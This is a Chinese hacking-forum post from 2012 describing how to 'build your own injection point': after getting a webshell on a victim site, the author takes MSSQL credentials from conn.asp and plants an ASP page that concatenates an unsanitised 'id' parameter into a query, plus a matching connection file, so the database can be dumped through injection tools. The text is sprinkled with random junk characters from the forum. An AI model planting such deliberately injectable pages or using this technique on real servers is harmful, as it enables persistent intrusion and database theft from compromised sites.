找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1863|回复: 0
打印 上一主题 下一主题

自己构造注入点方便入侵

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:27:31 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
自己构造注入点方便入侵  @/ N3 `0 k" z
" [- I/ U5 ?( q9 I# J/ t* ?
今天看了rootkit论坛里面有人要我写出来关于伪造一个注入点,然后方便渗透,找到更多的可利用的信息2 Y' X6 d8 R# ?; C
0 e/ W0 l. P1 ^# D- }7 k- Z
这两天一直考试,想了下,就先仍出来,有什么问题可以提出来,我们一起讨论!5 q5 h/ {+ R, V* K

( P. e% E9 d: ], b8 g7 K- K3 j6 T% f首先你要拿了一个webshell,这样你找到连接数据库的文件,大多都是conn.asp这个文件里面有mssql的用户和
  x6 E* }2 H% @# b& p+ q' \
; u! K  ~4 X9 [密码,你要找到用户名、密码、数据库所在的IP,然后连接上去,至于连接大家应该都会,找到网站管理员的表% U# l9 T! _& z3 z6 P4 {

1 C6 |" Z3 _7 y% O9 c" ^因为我测试的时候是用管理员的表,我朋友说任何表名都可以,只要这个表存在,代码如下:. T$ z, {$ o9 n# [

3 S" @% H5 X- y, A1 Z& C/ s& ]" [程序代码
) Q  _# `: b1 H% Q# T<!--#include file="xx.asp"-->4 H! W% ?7 e+ r; Y$ r
<%! l& s) B* i, g: K5 @1 B. }
set rs=server.createobject("ADODB.recordset")/ `; O' _& E! O* y* T* y
id = request("id")6 M* l# Q/ D8 i" C5 O1 k) C
strSQL = "select * from admin where id=" & id
6 K& w9 H1 A( t, B& M0 T+ q' F' Prs.open strSQL,conn,1,3" Z/ x' \" P3 Y# K
rs.close
8 W3 b  Z4 x: v! D' B3 j/ B$ D%>/ m9 t- }' O: w- ^7 Y- O
) W3 c8 ^: S$ u* h! p* f. k! j
把strSQL = "select * from admin where id=" & id 这句话里面的admin换成要伪造的表名,注意必须存在8 `+ r! r6 p: m; a( H
* s' S! c' }3 W' L
你可以连接上去看下表名就是了!这里假设的是admin是表名!这个文件名随便保存!; H; G2 g$ R/ z9 @2 \7 d2 a
+ ]# m: \9 |1 b: d# e" E2 ^$ h
然后就要构造一个连接数据库的文件了,代码如下:
% K0 F) q; I+ j- Y  q( w程序代码6 B! k* ]! R( A# o& `3 s
<%        
' u0 h7 M" A- G& VstrSQLServerName = "000.000.000.000"     '服务器名称或地址
5 J- a7 u7 e% z" O9 f# {strSQLDBUserName = "sqlname"         '数据库帐号- J' w9 b. ?( c6 e2 s
strSQLDBPassword = "sqlpass"         '数据库密码$ S7 k3 E- l5 |) w4 a
strSQLDBName = "sqldataname"           '数据库名称5 z  s  W, ^& Z  k2 D) u- l. Q
Set conn = Server.CreateObject("ADODB.Connection")
( Y/ ?+ Z0 q) f7 estrCon = "rovider=SQLOLEDB.1ersist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & "assword=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"
- L( y9 V8 I( F+ Q5 u) c. Wconn.open strCon1 t5 `% h4 v" v9 u" n* n
%>
' U0 C0 j2 ^( p( e1 v4 [, ?$ W. t5 q" |7 f2 O% n/ E/ ]
这里应该都会了,就不罗嗦了,不过注意的是保存的文件名要和include调用的名字一样。。还是罗嗦话,
% z1 Z$ \) W  ^- E) m
, X  J3 T6 I, b0 \就这样,正常情况下,就OK了,伪造成功……
. R7 E" x2 P5 _% m, F5 f  m+ Z; g6 i9 U2 s3 g0 T2 B
           如果有什么问题可以提出来大家一起探讨解决。
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表